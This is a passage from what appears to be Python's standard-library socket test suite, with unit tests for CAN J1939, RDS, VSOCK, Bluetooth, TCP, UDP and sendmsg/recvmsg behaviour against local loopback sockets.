self.assertEqual(s.getsockname(), addr)
except OSError as e:
if e.errno == errno.ENODEV:
self.skipTest('network interface `%s` does not exist' %
self.interface)
else:
raise
@unittest.skipUnless(HAVE_SOCKET_CAN_J1939, 'CAN J1939 required for this test.')
class J1939Test(unittest.TestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.interface = "vcan0"
@unittest.skipUnless(hasattr(socket, "CAN_J1939"),
'socket.CAN_J1939 required for this test.')
def testJ1939Constants(self):
socket.CAN_J1939
socket.J1939_MAX_UNICAST_ADDR
socket.J1939_IDLE_ADDR
socket.J1939_NO_ADDR
socket.J1939_NO_NAME
socket.J1939_PGN_REQUEST
socket.J1939_PGN_ADDRESS_CLAIMED
socket.J1939_PGN_ADDRESS_COMMANDED
socket.J1939_PGN_PDU1_MAX
socket.J1939_PGN_MAX
socket.J1939_NO_PGN
# J1939 socket options
socket.SO_J1939_FILTER
socket.SO_J1939_PROMISC
socket.SO_J1939_SEND_PRIO
socket.SO_J1939_ERRQUEUE
socket.SCM_J1939_DEST_ADDR
socket.SCM_J1939_DEST_NAME
socket.SCM_J1939_PRIO
socket.SCM_J1939_ERRQUEUE
socket.J1939_NLA_PAD
socket.J1939_NLA_BYTES_ACKED
socket.J1939_EE_INFO_NONE
socket.J1939_EE_INFO_TX_ABORT
socket.J1939_FILTER_MAX
@unittest.skipUnless(hasattr(socket, "CAN_J1939"),
'socket.CAN_J1939 required for this test.')
def testCreateJ1939Socket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_J1939) as s:
pass
def testBind(self):
try:
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_J1939) as s:
addr = self.interface, socket.J1939_NO_NAME, socket.J1939_NO_PGN, socket.J1939_NO_ADDR
s.bind(addr)
self.assertEqual(s.getsockname(), addr)
except OSError as e:
if e.errno == errno.ENODEV:
self.skipTest('network interface `%s` does not exist' %
self.interface)
else:
raise
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class BasicRDSTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_RDS
socket.PF_RDS
def testCreateSocket(self):
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
pass
def testSocketBufferSize(self):
bufsize = 16384
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, bufsize)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, bufsize)
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class RDSTest(ThreadedRDSSocketTest):
def __init__(self, methodName='runTest'):
ThreadedRDSSocketTest.__init__(self, methodName=methodName)
def setUp(self):
super().setUp()
self.evt = threading.Event()
def testSendAndRecv(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
self.assertEqual(self.cli_addr, addr)
def _testSendAndRecv(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testPeek(self):
data, addr = self.serv.recvfrom(self.bufsize, socket.MSG_PEEK)
self.assertEqual(self.data, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testPeek(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
@requireAttrs(socket.socket, 'recvmsg')
def testSendAndRecvMsg(self):
data, ancdata, msg_flags, addr = self.serv.recvmsg(self.bufsize)
self.assertEqual(self.data, data)
@requireAttrs(socket.socket, 'sendmsg')
def _testSendAndRecvMsg(self):
self.data = b'hello ' * 10
self.cli.sendmsg([self.data], (), 0, (HOST, self.port))
def testSendAndRecvMulti(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data1, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data2, data)
def _testSendAndRecvMulti(self):
self.data1 = b'bacon'
self.cli.sendto(self.data1, 0, (HOST, self.port))
self.data2 = b'egg'
self.cli.sendto(self.data2, 0, (HOST, self.port))
def testSelect(self):
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testSelect(self):
self.data = b'select'
self.cli.sendto(self.data, 0, (HOST, self.port))
@unittest.skipUnless(HAVE_SOCKET_QIPCRTR,
'QIPCRTR sockets required for this test.')
class BasicQIPCRTRTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_QIPCRTR
def testCreateSocket(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
pass
def testUnbound(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
self.assertEqual(s.getsockname()[1], 0)
def testBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
socket_helper.bind_port(s, host=s.getsockname()[0])
self.assertNotEqual(s.getsockname()[1], 0)
def testInvalidBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
self.assertRaises(OSError, socket_helper.bind_port, s, host=-2)
def testAutoBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
s.connect((123, 123))
self.assertNotEqual(s.getsockname()[1], 0)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
class BasicVSOCKTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_VSOCK
def testVSOCKConstants(self):
socket.SO_VM_SOCKETS_BUFFER_SIZE
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE
socket.VMADDR_CID_ANY
socket.VMADDR_PORT_ANY
socket.VMADDR_CID_HOST
socket.VM_SOCKETS_INVALID_VERSION
socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID
def testCreateSocket(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
pass
def testSocketBufferSize(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
orig_max = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE)
orig = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE)
orig_min = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE, orig_max * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE, orig * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE, orig_min * 2)
self.assertEqual(orig_max * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE))
self.assertEqual(orig * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE))
self.assertEqual(orig_min * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE))
@unittest.skipUnless(HAVE_SOCKET_BLUETOOTH,
'Bluetooth sockets required for this test.')
class BasicBluetoothTest(unittest.TestCase):
def testBluetoothConstants(self):
socket.BDADDR_ANY
socket.BDADDR_LOCAL
socket.AF_BLUETOOTH
socket.BTPROTO_RFCOMM
if sys.platform != "win32":
socket.BTPROTO_HCI
socket.SOL_HCI
socket.BTPROTO_L2CAP
if not sys.platform.startswith("freebsd"):
socket.BTPROTO_SCO
def testCreateRfcommSocket(self):
with socket.socket(socket.AF_BLUETOOTH, socket.SOCK_STREAM, socket.BTPROTO_RFCOMM) as s:
pass
@unittest.skipIf(sys.platform == "win32", "windows does not support L2CAP sockets")
def testCreateL2capSocket(self):
with socket.socket(socket.AF_BLUETOOTH, socket.SOCK_SEQPACKET, socket.BTPROTO_L2CAP) as s:
pass
@unittest.skipIf(sys.platform == "win32", "windows does not support HCI sockets")
def testCreateHciSocket(self):
with socket.socket(socket.AF_BLUETOOTH, socket.SOCK_RAW, socket.BTPROTO_HCI) as s:
pass
@unittest.skipIf(sys.platform == "win32" or sys.platform.startswith("freebsd"),
"windows and freebsd do not support SCO sockets")
def testCreateScoSocket(self):
with socket.socket(socket.AF_BLUETOOTH, socket.SOCK_SEQPACKET, socket.BTPROTO_SCO) as s:
pass
class BasicTCPTest(SocketConnectedTest):
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecv(self):
# Testing large receive over TCP
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.serv_conn.send(MSG)
def testOverFlowRecv(self):
# Testing receive in chunks over TCP
seg1 = self.cli_conn.recv(len(MSG) - 3)
seg2 = self.cli_conn.recv(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecv(self):
self.serv_conn.send(MSG)
def testRecvFrom(self):
# Testing large recvfrom() over TCP
msg, addr = self.cli_conn.recvfrom(1024)
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.serv_conn.send(MSG)
def testOverFlowRecvFrom(self):
# Testing recvfrom() in chunks over TCP
seg1, addr = self.cli_conn.recvfrom(len(MSG)-3)
seg2, addr = self.cli_conn.recvfrom(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecvFrom(self):
self.serv_conn.send(MSG)
def testSendAll(self):
# Testing sendall() with a 2048 byte string over TCP
msg = b''
while True:
read = self.cli_conn.recv(1024)
if not read:
break
msg += read
self.assertEqual(msg, b'f' * 2048)
def _testSendAll(self):
big_chunk = b'f' * 2048
self.serv_conn.sendall(big_chunk)
def testFromFd(self):
# Testing fromfd()
fd = self.cli_conn.fileno()
sock = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
self.assertIsInstance(sock, socket.socket)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testFromFd(self):
self.serv_conn.send(MSG)
def testDup(self):
# Testing dup()
sock = self.cli_conn.dup()
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDup(self):
self.serv_conn.send(MSG)
def testShutdown(self):
# Testing shutdown()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
# wait for _testShutdown to finish: on OS X, when the server
# closes the connection the client also becomes disconnected,
# and the client's shutdown call will fail. (Issue #4397.)
self.done.wait()
def _testShutdown(self):
self.serv_conn.send(MSG)
self.serv_conn.shutdown(2)
testShutdown_overflow = support.cpython_only(testShutdown)
@support.cpython_only
def _testShutdown_overflow(self):
import _testcapi
self.serv_conn.send(MSG)
# Issue 15989
self.assertRaises(OverflowError, self.serv_conn.shutdown,
_testcapi.INT_MAX + 1)
self.assertRaises(OverflowError, self.serv_conn.shutdown,
2 + (_testcapi.UINT_MAX + 1))
self.serv_conn.shutdown(2)
def testDetach(self):
# Testing detach()
fileno = self.cli_conn.fileno()
f = self.cli_conn.detach()
self.assertEqual(f, fileno)
# cli_conn cannot be used anymore...
self.assertTrue(self.cli_conn._closed)
self.assertRaises(OSError, self.cli_conn.recv, 1024)
self.cli_conn.close()
# ...but we can create another socket using the (still open)
# file descriptor
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=f)
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDetach(self):
self.serv_conn.send(MSG)
class BasicUDPTest(ThreadedUDPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedUDPSocketTest.__init__(self, methodName=methodName)
def testSendtoAndRecv(self):
# Testing sendto() and recv() over UDP
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDP
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
class BasicUDPLITETest(ThreadedUDPLITESocketTest):
def __init__(self, methodName='runTest'):
ThreadedUDPLITESocketTest.__init__(self, methodName=methodName)
def testSendtoAndRecv(self):
# Testing sendto() and recv() over UDPLITE
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDPLITE
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
# Tests for the sendmsg()/recvmsg() interface. Where possible, the
# same test code is used with different families and types of socket
# (e.g. stream, datagram), and tests using recvmsg() are repeated
# using recvmsg_into().
#
# The generic test classes such as SendmsgTests and
# RecvmsgGenericTests inherit from SendrecvmsgBase and expect to be
# supplied with sockets cli_sock and serv_sock representing the
# client's and the server's end of the connection respectively, and
# attributes cli_addr and serv_addr holding their (numeric where
# appropriate) addresses.
#
# The final concrete test classes combine these with subclasses of
# SocketTestBase which set up client and server sockets of a specific
# type, and with subclasses of SendrecvmsgBase such as
# SendrecvmsgDgramBase and SendrecvmsgConnectedBase which map these
# sockets to cli_sock and serv_sock and override the methods and
# attributes of SendrecvmsgBase to fill in destination addresses if
# needed when sending, check for specific flags in msg_flags, etc.
#
# RecvmsgIntoMixin provides a version of doRecvmsg() implemented using
# recvmsg_into().
# XXX: like the other datagram (UDP) tests in this module, the code
# here assumes that datagram delivery on the local machine will be
# reliable.
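# As an illustrative sketch only (not exercised by the tests below, and
# assuming a platform that provides both calls), a minimal
# sendmsg()/recvmsg() round trip over a connected pair of sockets looks
# roughly like:
#
#   import socket
#   a, b = socket.socketpair()
#   a.sendmsg([b"he", b"llo"])          # gather-write two buffers
#   data, ancdata, msg_flags, addr = b.recvmsg(1024)
#   # typically data == b"hello" and ancdata == [] (no control messages)
#   a.close(); b.close()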
class SendrecvmsgBase(ThreadSafeCleanupTestCase):
# Base class for sendmsg()/recvmsg() tests.
# Time in seconds to wait before considering a test failed, or
# None for no timeout. Not all tests actually set a timeout.
fail_timeout = support.LOOPBACK_TIMEOUT
def setUp(self):
self.misc_event = threading.Event()
super().setUp()
def sendToServer(self, msg):
# Send msg to the server.
return self.cli_sock.send(msg)
# Tuple of alternative default arguments for sendmsg() when called
# via sendmsgToServer() (e.g. to include a destination address).
sendmsg_to_server_defaults = ()
def sendmsgToServer(self, *args):
# Call sendmsg() on self.cli_sock with the given arguments,
# filling in any arguments which are not supplied with the
# corresponding items of self.sendmsg_to_server_defaults, if
# any.
return self.cli_sock.sendmsg(
*(args + self.sendmsg_to_server_defaults[len(args):]))
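# For instance, in the connectionless subclasses below, where
# sendmsg_to_server_defaults is ([], [], 0, self.serv_addr), a call
# such as self.sendmsgToServer([MSG]) expands to
# self.cli_sock.sendmsg([MSG], [], 0, self.serv_addr), while callers
# that pass more arguments override the corresponding defaults.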
def doRecvmsg(self, sock, bufsize, *args):
# Call recvmsg() on sock with given arguments and return its
# result. Should be used for tests which can use either
# recvmsg() or recvmsg_into() - RecvmsgIntoMixin overrides
# this method with one which emulates it using recvmsg_into(),
# thus allowing the same test to be used for both methods.
result = sock.recvmsg(bufsize, *args)
self.registerRecvmsgResult(result)
return result
def registerRecvmsgResult(self, result):
# Called by doRecvmsg() with the return value of recvmsg() or
# recvmsg_into(). Can be overridden to arrange cleanup based
# on the returned ancillary data, for instance.
pass
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer.
self.assertEqual(addr1, addr2)
# Flags that are normally unset in msg_flags
msg_flags_common_unset = 0
for name in ("MSG_CTRUNC", "MSG_OOB"):
msg_flags_common_unset |= getattr(socket, name, 0)
# Flags that are normally set
msg_flags_common_set = 0
# Flags set when a complete record has been received (e.g. MSG_EOR
# for SCTP)
msg_flags_eor_indicator = 0
# Flags set when a complete record has not been received
# (e.g. MSG_TRUNC for datagram sockets)
msg_flags_non_eor_indicator = 0
def checkFlags(self, flags, eor=None, checkset=0, checkunset=0, ignore=0):
# Method to check the value of msg_flags returned by recvmsg[_into]().
#
# Checks that all bits in msg_flags_common_set attribute are
# set in "flags" and all bits in msg_flags_common_unset are
# unset.
#
# The "eor" argument specifies whether the flags should
# indicate that a full record (or datagram) has been received.
# If "eor" is None, no checks are done; otherwise, checks
# that:
#
# * if "eor" is true, all bits in msg_flags_eor_indicator are
# set and all bits in msg_flags_non_eor_indicator are unset
#
# * if "eor" is false, all bits in msg_flags_non_eor_indicator
# are set and all bits in msg_flags_eor_indicator are unset
#
# If "checkset" and/or "checkunset" are supplied, they require
# the given bits to be set or unset respectively, overriding
# what the attributes require for those bits.
#
# If any bits are set in "ignore", they will not be checked,
# regardless of the other inputs.
#
# Will raise Exception if the inputs require a bit to be both
# set and unset, and it is not ignored.
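# As a hypothetical worked example: for a datagram socket, where
# msg_flags_non_eor_indicator includes MSG_TRUNC, a call like
# checkFlags(flags, eor=False) requires MSG_TRUNC to be set and
# MSG_CTRUNC/MSG_OOB to be unset, whereas additionally passing
# ignore=socket.MSG_TRUNC removes the MSG_TRUNC requirement without
# affecting the other checks.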
defaultset = self.msg_flags_common_set
defaultunset = self.msg_flags_common_unset
if eor:
defaultset |= self.msg_flags_eor_indicator
defaultunset |= self.msg_flags_non_eor_indicator
elif eor is not None:
defaultset |= self.msg_flags_non_eor_indicator
defaultunset |= self.msg_flags_eor_indicator
# Function arguments override defaults
defaultset &= ~checkunset
defaultunset &= ~checkset
# Merge arguments with remaining defaults, and check for conflicts
checkset |= defaultset
checkunset |= defaultunset
inboth = checkset & checkunset & ~ignore
if inboth:
raise Exception("contradictory set, unset requirements for flags "
"{0:#x}".format(inboth))
# Compare with given msg_flags value
mask = (checkset | checkunset) & ~ignore
self.assertEqual(flags & mask, checkset & mask)
class RecvmsgIntoMixin(SendrecvmsgBase):
# Mixin to implement doRecvmsg() using recvmsg_into().
def doRecvmsg(self, sock, bufsize, *args):
buf = bytearray(bufsize)
result = sock.recvmsg_into([buf], *args)
self.registerRecvmsgResult(result)
self.assertGreaterEqual(result[0], 0)
self.assertLessEqual(result[0], bufsize)
return (bytes(buf[:result[0]]),) + result[1:]
class SendrecvmsgDgramFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for datagram sockets.
@property
def msg_flags_non_eor_indicator(self):
return super().msg_flags_non_eor_indicator | socket.MSG_TRUNC
class SendrecvmsgSCTPFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for SCTP sockets.
@property
def msg_flags_eor_indicator(self):
return super().msg_flags_eor_indicator | socket.MSG_EOR
class SendrecvmsgConnectionlessBase(SendrecvmsgBase):
# Base class for tests on connectionless-mode sockets. Users must
# supply sockets on attributes cli and serv to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.serv
@property
def cli_sock(self):
return self.cli
@property
def sendmsg_to_server_defaults(self):
return ([], [], 0, self.serv_addr)
def sendToServer(self, msg):
return self.cli_sock.sendto(msg, self.serv_addr)
class SendrecvmsgConnectedBase(SendrecvmsgBase):
# Base class for tests on connected sockets. Users must supply
# sockets on attributes serv_conn and cli_conn (representing the
# connections *to* the server and the client), to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.cli_conn
@property
def cli_sock(self):
return self.serv_conn
def checkRecvmsgAddress(self, addr1, addr2):
# Address is currently "unspecified" for a connected socket,
# so we don't examine it
pass
class SendrecvmsgServerTimeoutBase(SendrecvmsgBase):
# Base class to set a timeout on server's socket.
def setUp(self):
super().setUp()
self.serv_sock.settimeout(self.fail_timeout)
class SendmsgTests(SendrecvmsgServerTimeoutBase):
# Tests for sendmsg() which can use any socket type and do not
# involve recvmsg() or recvmsg_into().
def testSendmsg(self):
# Send a simple message with sendmsg().
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG]), len(MSG))
def testSendmsgDataGenerator(self):
# Send from buffer obtained from a generator (not a sequence).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgDataGenerator(self):
self.assertEqual(self.sendmsgToServer((o for o in [MSG])),
len(MSG))
def testSendmsgAncillaryGenerator(self):
# Gather (empty) ancillary data from a generator.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgAncillaryGenerator(self):
self.assertEqual(self.sendmsgToServer([MSG], (o for o in [])),
len(MSG))
def testSendmsgArray(self):
# Send data from an array instead of the usual bytes object.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgArray(self):
self.assertEqual(self.sendmsgToServer([array.array("B", MSG)]),
len(MSG))
def testSendmsgGather(self):
# Send message data from more than one buffer (gather write).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgGather(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
def testSendmsgBadArgs(self):
# Check that sendmsg() rejects invalid arguments.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadArgs(self):
self.assertRaises(TypeError, self.cli_sock.sendmsg)
self.assertRaises(TypeError, self.sendmsgToServer,
b"not in an iterable")
self.assertRaises(TypeError, self.sendmsgToServer,
object())
self.assertRaises(TypeError, self.sendmsgToServer,
[object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG, object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], 0, object())
self.sendToServer(b"done")
def testSendmsgBadCmsg(self):
# Check that invalid ancillary data items are rejected.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(object(), 0, b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, object(), b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, object())])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0)])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b"data", 42)])
self.sendToServer(b"done")
@requireAttrs(socket, "CMSG_SPACE")
def testSendmsgBadMultiCmsg(self):
# Check that invalid ancillary data items are rejected when
# more than one item is present.
self.assertEqual(self.serv_sock.recv(1000), b"done")
@testSendmsgBadMultiCmsg.client_skip
def _testSendmsgBadMultiCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [0, 0, b""])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b""), object()])
self.sendToServer(b"done")
def testSendmsgExcessCmsgReject(self):
# Check that sendmsg() rejects excess ancillary data items
# when the number that can be sent is limited.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgExcessCmsgReject(self):
if not hasattr(socket, "CMSG_SPACE"):
# Can only send one item
with self.assertRaises(OSError) as cm:
self.sendmsgToServer([MSG], [(0, 0, b""), (0, 0, b"")])
self.assertIsNone(cm.exception.errno)
self.sendToServer(b"done")
def testSendmsgAfterClose(self):
# Check that sendmsg() fails on a closed socket.
pass
def _testSendmsgAfterClose(self):
self.cli_sock.close()
self.assertRaises(OSError, self.sendmsgToServer, [MSG])
class SendmsgStreamTests(SendmsgTests):
# Tests for sendmsg() which require a stream socket and do not
# involve recvmsg() or recvmsg_into().
def testSendmsgExplicitNoneAddr(self):
# Check that peer address can be specified as None.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgExplicitNoneAddr(self):
self.assertEqual(self.sendmsgToServer([MSG], [], 0, None), len(MSG))
def testSendmsgTimeout(self):
# Check that timeout works with sendmsg().
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
def _testSendmsgTimeout(self):
try:
self.cli_sock.settimeout(0.03)
try:
while True:
self.sendmsgToServer([b"a"*512])
except socket.timeout:
pass
except OSError as exc:
if exc.errno != errno.ENOMEM:
raise
# bpo-33937 the test randomly fails on Travis CI with
# "OSError: [Errno 12] Cannot allocate memory"
else:
self.fail("socket.timeout not raised")
finally:
self.misc_event.set()
# XXX: would be nice to have more tests for sendmsg flags argument.
# Linux supports MSG_DONTWAIT when sending, but in general, it
# only works when receiving. Could add other platforms if they
# support it too.
@skipWithClientIf(sys.platform not in {"linux"},
"MSG_DONTWAIT not known to work on this platform when "
"sending")
def testSendmsgDontWait(self):
# Check that MSG_DONTWAIT in flags causes non-blocking behaviour.
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@testSendmsgDontWait.client_skip
def _testSendmsgDontWait(self):
try:
with self.assertRaises(OSError) as cm:
while True:
self.sendmsgToServer([b"a"*512], [], socket.MSG_DONTWAIT)
# bpo-33937: catch also ENOMEM, the test randomly fails on Travis CI
# with "OSError: [Errno 12] Cannot allocate memory"
self.assertIn(cm.exception.errno,
(errno.EAGAIN, errno.EWOULDBLOCK, errno.ENOMEM))
finally:
self.misc_event.set()
class SendmsgConnectionlessTests(SendmsgTests):
# Tests for sendmsg() which require a connectionless-mode
# (e.g. datagram) socket, and do not involve recvmsg() or
# recvmsg_into().
def testSendmsgNoDestAddr(self):
# Check that sendmsg() fails when no destination address is
# given for unconnected socket.
pass
def _testSendmsgNoDestAddr(self):
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG])
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG], [], 0, None)
class RecvmsgGenericTests(SendrecvmsgBase):
# Tests for recvmsg() which can also be emulated using
# recvmsg_into(), and can use any socket type.
def testRecvmsg(self):
# Receive a simple message with recvmsg[_into]().
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsg(self):
self.sendToServer(MSG)
def testRecvmsgExplicitDefaults(self):
# Test recvmsg[_into]() with default arguments provided explicitly.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgExplicitDefaults(self):
self.sendToServer(MSG)
def testRecvmsgShorter(self):
# Receive a message smaller than buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) + 42)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShorter(self):
self.sendToServer(MSG)
def testRecvmsgTrunc(self):
# Receive part of message, check for truncation indicators.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
def _testRecvmsgTrunc(self):
self.sendToServer(MSG)
def testRecvmsgShortAncillaryBuf(self):
# Test ancillary data buffer too small to hold any ancillary data.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShortAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgLongAncillaryBuf(self):
# Test large ancillary data buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgLongAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgAfterClose(self):
# Check that recvmsg[_into]() fails on a closed socket.
self.serv_sock.close()
self.assertRaises(OSError, self.doRecvmsg, self.serv_sock, 1024)
def _testRecvmsgAfterClose(self):
pass
def testRecvmsgTimeout(self):
# Check that timeout works.
try:
self.serv_sock.settimeout(0.03)
self.assertRaises(socket.timeout,
self.doRecvmsg, self.serv_sock, len(MSG))
finally:
self.misc_event.set()
def _testRecvmsgTimeout(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@requireAttrs(socket, "MSG_PEEK")
def testRecvmsgPeek(self):
# Check that MSG_PEEK in flags enables examination of pending
# data without consuming it.
# Receive part of data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3, 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
# Ignoring MSG_TRUNC here (so this test is the same for stream
